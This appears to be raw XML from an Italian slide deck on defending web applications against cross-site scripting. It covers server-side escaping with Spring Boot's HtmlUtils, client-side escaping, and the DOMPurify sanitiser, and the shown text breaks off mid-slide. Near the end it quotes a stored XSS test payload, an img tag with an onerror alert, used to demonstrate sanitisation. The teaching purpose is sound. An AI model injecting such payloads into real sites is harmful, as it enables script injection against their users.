          <p:cNvPr id="11" name="Immagine 10" descr="Immagine che contiene testo, schermata, vestiti, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37557628-1D92-59B3-BA7A-FE8A44A90BBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6199632" y="3849136"/>
            <a:ext cx="5442758" cy="2788392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133116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Escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> output lato server</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rPr>
              <a:t>L’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> dei dati in output è fondamentale per convertire i caratteri speciali o riservati in entità HTML corrispondenti, evitando che vengano interpretati come markup o o consentire l'inserimento di script dannosi all'interno delle pagine web, mettendo a rischio la sicurezza dell'applicazione e degli utenti.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>L’obiettivo principale dell'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> dei dati in output lato server è garantire che i dati trasmessi al client siano formattati correttamente e privi di caratteri speciali che potrebbero interferire con il markup o causare problemi di sicurezza.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>Per effettuare l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t> in Spring Boot è stato utilizzato la classe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>HtmlUtils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>, fornita da Spring Boot, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>progettata per semplificare l'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t> e il rendering di contenuti HTML sicuri. Il metodo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>htmlEscape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>HtmlUtils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t> accetta una stringa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t> come input e restituisce la stringa con i caratteri speciali HTML convertiti in entità HTML corrispondenti.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo, Carattere, schermata, Elementi grafici&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BFA286B-3AAC-77D9-84A7-EA7268F22F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7016496" y="5469230"/>
            <a:ext cx="4267200" cy="977900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2014308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Escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> output client side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rPr>
              <a:t>In generale, l'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> lato server è fondamentale per proteggere i dati prima che vengano trasmessi al client. Tuttavia, l'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> lato client può essere un'ulteriore precauzione per garantire la sicurezza dei dati e prevenire attacchi XSS.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Per l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> lato client è stata definita una funzion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7948918F-3997-D4DB-338C-271890FE7416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308593" y="4325112"/>
            <a:ext cx="4140200" cy="1943100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene pianta da appartamento, vaso da fiori, testo, pianta&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F95E6E7-4D30-0697-5482-0BCA68BFBC82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="6946"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7379386" y="3429000"/>
            <a:ext cx="4318628" cy="3062492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249276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DOMPurify</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err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DomPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> è una libreria JavaScript progettata per sanificare, dunque pulire, il markup HTML fornito da input non attendibili. Il suo obiettivo principale è prevenire gli attacchi XSS (Cross-Site Scripting) e proteggere le applicazioni web da potenziali vulnerabilità di sicurezza.</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La libreria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DomPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> lavora analizzando il markup HTML fornito e rimuovendo qualsiasi tag, attributo o evento non consentito.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Ciò garantisce che il markup HTML risultante sia sicuro da eseguire all'interno di una pagina web senza rischi di esecuzione di codice dannoso o iniettato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2527480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DOMPurify</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b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DomPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> offre diverse funzionalità, tra cui:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Rimozione dei tag non consentiti: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DomPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> identifica e rimuove automaticamente i tag HTML non consentiti, come &lt;script&gt;, &lt;style&gt;, &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;, ecc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Pulizia degli attributi non consentiti: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DomPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> controlla e rimuove gli attributi HTML non consentiti, come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, style, ecc., che possono essere utilizzati per iniettare codice JavaScript o stili dannosi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Sanificazione delle URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DomPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> sanifica le URL presenti nel markup HTML per prevenire potenziali attacchi di tipo URL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> XSS</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È stato testato l'utilizzo di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> per l'output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>dei dati provenienti dal database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, in sostituzione all'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Tuttavia, è importante notare che la semplicità di utilizzo di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> fa comprendere che è una buona pratica utilizzarlo anche per la sanitizzazione dei dati in input immessi dall’utente.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197157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DOMPurify</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br>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>In figura è mostrato l’output della stringa conservata nel database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Attacked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>")&gt;. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
